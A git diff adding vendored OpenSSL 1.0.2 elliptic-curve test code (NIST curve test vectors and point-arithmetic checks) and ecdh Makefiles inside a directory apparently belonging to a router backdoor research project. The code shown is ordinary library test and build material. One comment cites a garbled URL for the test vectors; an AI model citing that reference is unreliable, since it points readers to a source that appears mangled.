+         "03FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEF90399660FC938A90165B042A7CEFADB307",
+         "2", 283, C2_B283);
+
+    /* Curve K-409 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve K-409",
+         "02000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000001",
+         "0",
+         "1",
+         "0060F05F658F49C1AD3AB1890F7184210EFD0987E307C84C27ACCFB8F9F67CC2C460189EB5AAAA62EE222EB1B35540CFE9023746",
+         "01E369050B7C4E42ACBA1DACBF04299C3460782F918EA427E6325165E9EA10E3DA5F6C42E9C55215AA9CA27A5863EC48D8E0286B",
+         1,
+         "007FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE5F83B2D4EA20400EC4557D5ED3E3E7CA5B4B5C83B8E01E5FCF",
+         "4", 409, C2_K409);
+
+    /* Curve B-409 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve B-409",
+         "02000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000001",
+         "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001",
+         "0021A5C2C8EE9FEB5C4B9A753B7B476B7FD6422EF1F3DD674761FA99D6AC27C8A9A197B272822F6CD57A55AA4F50AE317B13545F",
+         "015D4860D088DDB3496B0C6064756260441CDE4AF1771D4DB01FFE5B34E59703DC255A868A1180515603AEAB60794E54BB7996A7",
+         "0061B1CFAB6BE5F32BBFA78324ED106A7636B9C5A7BD198D0158AA4F5488D08F38514F1FDF4B4F40D2181B3681C364BA0273C706",
+         1,
+         "010000000000000000000000000000000000000000000000000001E2AAD6A612F33307BE5FA47C3C9E052F838164CD37D9A21173",
+         "2", 409, C2_B409);
+
+    /* Curve K-571 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve K-571",
+         "80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000425",
+         "0",
+         "1",
+         "026EB7A859923FBC82189631F8103FE4AC9CA2970012D5D46024804801841CA44370958493B205E647DA304DB4CEB08CBBD1BA39494776FB988B47174DCA88C7E2945283A01C8972",
+         "0349DC807F4FBF374F4AEADE3BCA95314DD58CEC9F307A54FFC61EFC006D8A2C9D4979C0AC44AEA74FBEBBB9F772AEDCB620B01A7BA7AF1B320430C8591984F601CD4C143EF1C7A3",
+         0,
+         "020000000000000000000000000000000000000000000000000000000000000000000000131850E1F19A63E4B391A8DB917F4138B630D84BE5D639381E91DEB45CFE778F637C1001",
+         "4", 571, C2_K571);
+
+    /* Curve B-571 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve B-571",
+         "80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000425",
+         "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001",
+         "02F40E7E2221F295DE297117B7F3D62F5C6A97FFCB8CEFF1CD6BA8CE4A9A18AD84FFABBD8EFA59332BE7AD6756A66E294AFD185A78FF12AA520E4DE739BACA0C7FFEFF7F2955727A",
+         "0303001D34B856296C16C0D40D3CD7750A93D1D2955FA80AA5F40FC8DB7B2ABDBDE53950F4C0D293CDD711A35B67FB1499AE60038614F1394ABFA3B4C850D927E1E7769C8EEC2D19",
+         "037BF27342DA639B6DCCFFFEB73D69D78C6C27A6009CBBCA1980F8533921E8A684423E43BAB08A576291AF8F461BB2A8B3531D2F0485C19B16E2F1516E23DD3C1A4827AF1B8AC15B",
+         1,
+         "03FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE661CE18FF55987308059B186823851EC7DD9CA1161DE93D5174D66E8382E9BB2FE84E47",
+         "2", 571, C2_B571);
+
+    /* more tests using the last curve */
+
+    if (!EC_POINT_copy(Q, P))
+        ABORT;
+    if (EC_POINT_is_at_infinity(group, Q))
+        ABORT;
+    if (!EC_POINT_dbl(group, P, P, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!EC_POINT_invert(group, Q, ctx))
+        ABORT;                  /* P = -2Q */
+
+    if (!EC_POINT_add(group, R, P, Q, ctx))
+        ABORT;
+    if (!EC_POINT_add(group, R, R, Q, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, R))
+        ABORT;                  /* R = P + 2Q */
+
+    {
+        const EC_POINT *points[3];
+        const BIGNUM *scalars[3];
+
+        if (EC_POINT_is_at_infinity(group, Q))
+            ABORT;
+        points[0] = Q;
+        points[1] = Q;
+        points[2] = Q;
+
+        if (!BN_add(y, z, BN_value_one()))
+            ABORT;
+        if (BN_is_odd(y))
+            ABORT;
+        if (!BN_rshift1(y, y))
+            ABORT;
+        scalars[0] = y;         /* (group order + 1)/2, so y*Q + y*Q = Q */
+        scalars[1] = y;
+
+        fprintf(stdout, "combined multiplication ...");
+        fflush(stdout);
+
+        /* z is still the group order */
+        if (!EC_POINTs_mul(group, P, NULL, 2, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINTs_mul(group, R, z, 2, points, scalars, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, P, R, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, R, Q, ctx))
+            ABORT;
+
+        fprintf(stdout, ".");
+        fflush(stdout);
+
+        if (!BN_pseudo_rand(y, BN_num_bits(y), 0, 0))
+            ABORT;
+        if (!BN_add(z, z, y))
+            ABORT;
+        BN_set_negative(z, 1);
+        scalars[0] = y;
+        scalars[1] = z;         /* z = -(order + y) */
+
+        if (!EC_POINTs_mul(group, P, NULL, 2, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINT_is_at_infinity(group, P))
+            ABORT;
+
+        fprintf(stdout, ".");
+        fflush(stdout);
+
+        if (!BN_pseudo_rand(x, BN_num_bits(y) - 1, 0, 0))
+            ABORT;
+        if (!BN_add(z, x, y))
+            ABORT;
+        BN_set_negative(z, 1);
+        scalars[0] = x;
+        scalars[1] = y;
+        scalars[2] = z;         /* z = -(x+y) */
+
+        if (!EC_POINTs_mul(group, P, NULL, 3, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINT_is_at_infinity(group, P))
+            ABORT;
+
+        fprintf(stdout, " ok\n\n");
+    }
+
+#  if 0
+    timings(C2_K163, TIMING_BASE_PT, ctx);
+    timings(C2_K163, TIMING_RAND_PT, ctx);
+    timings(C2_K163, TIMING_SIMUL, ctx);
+    timings(C2_B163, TIMING_BASE_PT, ctx);
+    timings(C2_B163, TIMING_RAND_PT, ctx);
+    timings(C2_B163, TIMING_SIMUL, ctx);
+    timings(C2_K233, TIMING_BASE_PT, ctx);
+    timings(C2_K233, TIMING_RAND_PT, ctx);
+    timings(C2_K233, TIMING_SIMUL, ctx);
+    timings(C2_B233, TIMING_BASE_PT, ctx);
+    timings(C2_B233, TIMING_RAND_PT, ctx);
+    timings(C2_B233, TIMING_SIMUL, ctx);
+    timings(C2_K283, TIMING_BASE_PT, ctx);
+    timings(C2_K283, TIMING_RAND_PT, ctx);
+    timings(C2_K283, TIMING_SIMUL, ctx);
+    timings(C2_B283, TIMING_BASE_PT, ctx);
+    timings(C2_B283, TIMING_RAND_PT, ctx);
+    timings(C2_B283, TIMING_SIMUL, ctx);
+    timings(C2_K409, TIMING_BASE_PT, ctx);
+    timings(C2_K409, TIMING_RAND_PT, ctx);
+    timings(C2_K409, TIMING_SIMUL, ctx);
+    timings(C2_B409, TIMING_BASE_PT, ctx);
+    timings(C2_B409, TIMING_RAND_PT, ctx);
+    timings(C2_B409, TIMING_SIMUL, ctx);
+    timings(C2_K571, TIMING_BASE_PT, ctx);
+    timings(C2_K571, TIMING_RAND_PT, ctx);
+    timings(C2_K571, TIMING_SIMUL, ctx);
+    timings(C2_B571, TIMING_BASE_PT, ctx);
+    timings(C2_B571, TIMING_RAND_PT, ctx);
+    timings(C2_B571, TIMING_SIMUL, ctx);
+#  endif
+
+    if (ctx)
+        BN_CTX_free(ctx);
+    BN_free(p);
+    BN_free(a);
+    BN_free(b);
+    EC_GROUP_free(group);
+    EC_POINT_free(P);
+    EC_POINT_free(Q);
+    EC_POINT_free(R);
+    BN_free(x);
+    BN_free(y);
+    BN_free(z);
+    BN_free(cof);
+
+    if (C2_K163)
+        EC_GROUP_free(C2_K163);
+    if (C2_B163)
+        EC_GROUP_free(C2_B163);
+    if (C2_K233)
+        EC_GROUP_free(C2_K233);
+    if (C2_B233)
+        EC_GROUP_free(C2_B233);
+    if (C2_K283)
+        EC_GROUP_free(C2_K283);
+    if (C2_B283)
+        EC_GROUP_free(C2_B283);
+    if (C2_K409)
+        EC_GROUP_free(C2_K409);
+    if (C2_B409)
+        EC_GROUP_free(C2_B409);
+    if (C2_K571)
+        EC_GROUP_free(C2_K571);
+    if (C2_B571)
+        EC_GROUP_free(C2_B571);
+
+}
+# endif
+
+static void internal_curve_test(void)
+{
+    EC_builtin_curve *curves = NULL;
+    size_t crv_len = 0, n = 0;
+    int ok = 1;
+
+    crv_len = EC_get_builtin_curves(NULL, 0);
+
+    curves = OPENSSL_malloc(sizeof(EC_builtin_curve) * crv_len);
+
+    if (curves == NULL)
+        return;
+
+    if (!EC_get_builtin_curves(curves, crv_len)) {
+        OPENSSL_free(curves);
+        return;
+    }
+
+    fprintf(stdout, "testing internal curves: ");
+
+    for (n = 0; n < crv_len; n++) {
+        EC_GROUP *group = NULL;
+        int nid = curves[n].nid;
+        if ((group = EC_GROUP_new_by_curve_name(nid)) == NULL) {
+            ok = 0;
+            fprintf(stdout, "\nEC_GROUP_new_curve_name() failed with"
+                    " curve %s\n", OBJ_nid2sn(nid));
+            /* try next curve */
+            continue;
+        }
+        if (!EC_GROUP_check(group, NULL)) {
+            ok = 0;
+            fprintf(stdout, "\nEC_GROUP_check() failed with"
+                    " curve %s\n", OBJ_nid2sn(nid));
+            EC_GROUP_free(group);
+            /* try the next curve */
+            continue;
+        }
+        fprintf(stdout, ".");
+        fflush(stdout);
+        EC_GROUP_free(group);
+    }
+    if (ok)
+        fprintf(stdout, " ok\n\n");
+    else {
+        fprintf(stdout, " failed\n\n");
+        ABORT;
+    }
+    OPENSSL_free(curves);
+    return;
+}
+
+# ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+/*
+ * nistp_test_params contains magic numbers for testing our optimized
+ * implementations of several NIST curves with characteristic > 3.
+ */
+struct nistp_test_params {
+    const EC_METHOD *(*meth) ();
+    int degree;
+    /*
+     * Qx, Qy and D are taken from
+     * http://csrcdocut.gov/groups/ST/toolkit/documents/Examples/ECDSA_Prime.pdf
+     * Otherwise, values are standard curve parameters from FIPS 180-3
+     */
+    const char *p, *a, *b, *Qx, *Qy, *Gx, *Gy, *order, *d;
+};
+
+static const struct nistp_test_params nistp_tests_params[] = {
+    {
+     /* P-224 */
+     EC_GFp_nistp224_method,
+     224,
+     /* p */
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000001",
+     /* a */
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFE",
+     /* b */
+     "B4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4",
+     /* Qx */
+     "E84FB0B8E7000CB657D7973CF6B42ED78B301674276DF744AF130B3E",
+     /* Qy */
+     "4376675C6FC5612C21A0FF2D2A89D2987DF7A2BC52183B5982298555",
+     /* Gx */
+     "B70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21",
+     /* Gy */
+     "BD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34",
+     /* order */
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D",
+     /* d */
+     "3F0C488E987C80BE0FEE521F8D90BE6034EC69AE11CA72AA777481E8",
+     },
+    {
+     /* P-256 */
+     EC_GFp_nistp256_method,
+     256,
+     /* p */
+     "ffffffff00000001000000000000000000000000ffffffffffffffffffffffff",
+     /* a */
+     "ffffffff00000001000000000000000000000000fffffffffffffffffffffffc",
+     /* b */
+     "5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b",
+     /* Qx */
+     "b7e08afdfe94bad3f1dc8c734798ba1c62b3a0ad1e9ea2a38201cd0889bc7a19",
+     /* Qy */
+     "3603f747959dbf7a4bb226e41928729063adc7ae43529e61b563bbc606cc5e09",
+     /* Gx */
+     "6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296",
+     /* Gy */
+     "4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5",
+     /* order */
+     "ffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551",
+     /* d */
+     "c477f9f65c22cce20657faa5b2d1d8122336f851a508a1ed04e479c34985bf96",
+     },
+    {
+     /* P-521 */
+     EC_GFp_nistp521_method,
+     521,
+     /* p */
+     "1ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
+     /* a */
+     "1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc",
+     /* b */
+     "051953eb9618e1c9a1f929a21a0b68540eea2da725b99b315f3b8b489918ef109e156193951ec7e937b1652c0bd3bb1bf073573df883d2c34f1ef451fd46b503f00",
+     /* Qx */
+     "0098e91eef9a68452822309c52fab453f5f117c1da8ed796b255e9ab8f6410cca16e59df403a6bdc6ca467a37056b1e54b3005d8ac030decfeb68df18b171885d5c4",
+     /* Qy */
+     "0164350c321aecfc1cca1ba4364c9b15656150b4b78d6a48d7d28e7f31985ef17be8554376b72900712c4b83ad668327231526e313f5f092999a4632fd50d946bc2e",
+     /* Gx */
+     "c6858e06b70404e9cd9e3ecb662395b4429c648139053fb521f828af606b4d3dbaa14b5e77efe75928fe1dc127a2ffa8de3348b3c1856a429bf97e7e31c2e5bd66",
+     /* Gy */
+     "11839296a789a3bc0045c8a5fb42c7d1bd998f54449579b446817afbd17273e662c97ee72995ef42640c550b9013fad0761353c7086a272c24088be94769fd16650",
+     /* order */
+     "1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffa51868783bf2f966b7fcc0148f709a5d03bb5c9b8899c47aebb6fb71e91386409",
+     /* d */
+     "0100085f47b8e1b8b11b7eb33028c0b2888e304bfc98501955b45bba1478dc184eeedf09b86a5f7c21994406072787205e69a63709fe35aa93ba333514b24f961722",
+     },
+};
+
+static void nistp_single_test(const struct nistp_test_params *test)
+{
+    BN_CTX *ctx;
+    BIGNUM *p, *a, *b, *x, *y, *n, *m, *order;
+    EC_GROUP *NISTP;
+    EC_POINT *G, *P, *Q, *Q_CHECK;
+
+    fprintf(stdout, "\nNIST curve P-%d (optimised implementation):\n",
+            test->degree);
+    ctx = BN_CTX_new();
+    p = BN_new();
+    a = BN_new();
+    b = BN_new();
+    x = BN_new();
+    y = BN_new();
+    m = BN_new();
+    n = BN_new();
+    order = BN_new();
+
+    NISTP = EC_GROUP_new(test->meth());
+    if (!NISTP)
+        ABORT;
+    if (!BN_hex2bn(&p, test->p))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn(&a, test->a))
+        ABORT;
+    if (!BN_hex2bn(&b, test->b))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(NISTP, p, a, b, ctx))
+        ABORT;
+    G = EC_POINT_new(NISTP);
+    P = EC_POINT_new(NISTP);
+    Q = EC_POINT_new(NISTP);
+    Q_CHECK = EC_POINT_new(NISTP);
+    if (!BN_hex2bn(&x, test->Qx))
+        ABORT;
+    if (!BN_hex2bn(&y, test->Qy))
+        ABORT;
+    if (!EC_POINT_set_affine_coordinates_GFp(NISTP, Q_CHECK, x, y, ctx))
+        ABORT;
+    if (!BN_hex2bn(&x, test->Gx))
+        ABORT;
+    if (!BN_hex2bn(&y, test->Gy))
+        ABORT;
+    if (!EC_POINT_set_affine_coordinates_GFp(NISTP, G, x, y, ctx))
+        ABORT;
+    if (!BN_hex2bn(&order, test->order))
+        ABORT;
+    if (!EC_GROUP_set_generator(NISTP, G, order, BN_value_one()))
+        ABORT;
+
+    fprintf(stdout, "verify degree ... ");
+    if (EC_GROUP_get_degree(NISTP) != test->degree)
+        ABORT;
+    fprintf(stdout, "ok\n");
+
+    fprintf(stdout, "NIST test vectors ... ");
+    if (!BN_hex2bn(&n, test->d))
+        ABORT;
+    /* fixed point multiplication */
+    EC_POINT_mul(NISTP, Q, n, NULL, NULL, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+    /* random point multiplication */
+    EC_POINT_mul(NISTP, Q, NULL, G, n, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+
+    /* set generator to P = 2*G, where G is the standard generator */
+    if (!EC_POINT_dbl(NISTP, P, G, ctx))
+        ABORT;
+    if (!EC_GROUP_set_generator(NISTP, P, order, BN_value_one()))
+        ABORT;
+    /* set the scalar to m=n/2, where n is the NIST test scalar */
+    if (!BN_rshift(m, n, 1))
+        ABORT;
+
+    /* test the non-standard generator */
+    /* fixed point multiplication */
+    EC_POINT_mul(NISTP, Q, m, NULL, NULL, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+    /* random point multiplication */
+    EC_POINT_mul(NISTP, Q, NULL, P, m, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+
+    /* now repeat all tests with precomputation */
+    if (!EC_GROUP_precompute_mult(NISTP, ctx))
+        ABORT;
+
+    /* fixed point multiplication */
+    EC_POINT_mul(NISTP, Q, m, NULL, NULL, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+    /* random point multiplication */
+    EC_POINT_mul(NISTP, Q, NULL, P, m, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+
+    /* reset generator */
+    if (!EC_GROUP_set_generator(NISTP, G, order, BN_value_one()))
+        ABORT;
+    /* fixed point multiplication */
+    EC_POINT_mul(NISTP, Q, n, NULL, NULL, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+    /* random point multiplication */
+    EC_POINT_mul(NISTP, Q, NULL, G, n, ctx);
+    if (0 != EC_POINT_cmp(NISTP, Q, Q_CHECK, ctx))
+        ABORT;
+
+    fprintf(stdout, "ok\n");
+    group_order_tests(NISTP);
+#  if 0
+    timings(NISTP, TIMING_BASE_PT, ctx);
+    timings(NISTP, TIMING_RAND_PT, ctx);
+#  endif
+    EC_GROUP_free(NISTP);
+    EC_POINT_free(G);
+    EC_POINT_free(P);
+    EC_POINT_free(Q);
+    EC_POINT_free(Q_CHECK);
+    BN_free(n);
+    BN_free(m);
+    BN_free(p);
+    BN_free(a);
+    BN_free(b);
+    BN_free(x);
+    BN_free(y);
+    BN_free(order);
+    BN_CTX_free(ctx);
+}
+
+static void nistp_tests()
+{
+    unsigned i;
+
+    for (i = 0;
+         i < sizeof(nistp_tests_params) / sizeof(struct nistp_test_params);
+         i++) {
+        nistp_single_test(&nistp_tests_params[i]);
+    }
+}
+# endif
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+int main(int argc, char *argv[])
+{
+
+    /* enable memory leak checking unless explicitly disabled */
+    if (!((getenv("OPENSSL_DEBUG_MEMORY") != NULL)
+          && (0 == strcmp(getenv("OPENSSL_DEBUG_MEMORY"), "off")))) {
+        CRYPTO_malloc_debug_init();
+        CRYPTO_set_mem_debug_options(V_CRYPTO_MDEBUG_ALL);
+    } else {
+        /* OPENSSL_DEBUG_MEMORY=off */
+        CRYPTO_set_mem_debug_functions(0, 0, 0, 0, 0);
+    }
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+    ERR_load_crypto_strings();
+
+    RAND_seed(rnd_seed, sizeof rnd_seed); /* or BN_generate_prime may fail */
+
+    prime_field_tests();
+    puts("");
+# ifndef OPENSSL_NO_EC2M
+    char2_field_tests();
+# endif
+# ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+    nistp_tests();
+# endif
+    /* test the internal curves */
+    internal_curve_test();
+
+# ifndef OPENSSL_NO_ENGINE
+    ENGINE_cleanup();
+# endif
+    CRYPTO_cleanup_all_ex_data();
+    ERR_free_strings();
+    ERR_remove_thread_state(NULL);
+    CRYPTO_mem_leaks_fp(stderr);
+
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile
new file mode 100644
index 0000000..b984d53
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile
@@ -0,0 +1,119 @@
+#
+# crypto/ecdh/Makefile
+#
+
+DIR=	ecdh
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g -Wall
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=ecdhtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ech_lib.c ech_ossl.c ech_key.c ech_err.c ech_kdf.c
+
+LIBOBJ=	ech_lib.o ech_ossl.o ech_key.o ech_err.o ech_kdf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ecdh.h
+HEADER=	ech_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ech_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_err.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ech_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ech_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ech_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_err.o: ech_err.c
+ech_kdf.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_kdf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_kdf.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_kdf.o: ../../include/openssl/evp.h ../../include/openssl/obj_mac.h
+ech_kdf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ech_kdf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ech_kdf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ech_kdf.o: ../../include/openssl/symhacks.h ech_kdf.c
+ech_key.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_key.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_key.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ech_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ech_key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_key.o: ech_key.c ech_locl.h
+ech_lib.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_lib.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+ech_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ech_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ech_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ech_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_lib.o: ech_lib.c ech_locl.h
+ech_ossl.o: ../../e_os.h ../../include/openssl/asn1.h
+ech_ossl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ech_ossl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+ech_ossl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ech_ossl.o: ../../include/openssl/ecdh.h ../../include/openssl/err.h
+ech_ossl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ech_ossl.o: ../../include/openssl/opensslconf.h
+ech_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ech_ossl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ech_ossl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ech_ossl.o: ../cryptlib.h ech_locl.h ech_ossl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile.save
new file mode 100644
index 0000000..b984d53
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdh/Makefile.save
@@ -0,0 +1,119 @@
+#
+# crypto/ecdh/Makefile
+#
+
+DIR=	ecdh
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g -Wall
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=ecdhtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ech_lib.c ech_ossl.c ech_key.c ech_err.c ech_kdf.c
+
+LIBOBJ=	ech_lib.o ech_ossl.o ech_key.o ech_err.o ech_kdf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ecdh.h
+HEADER=	ech_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ech_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ech_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+ech_err.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
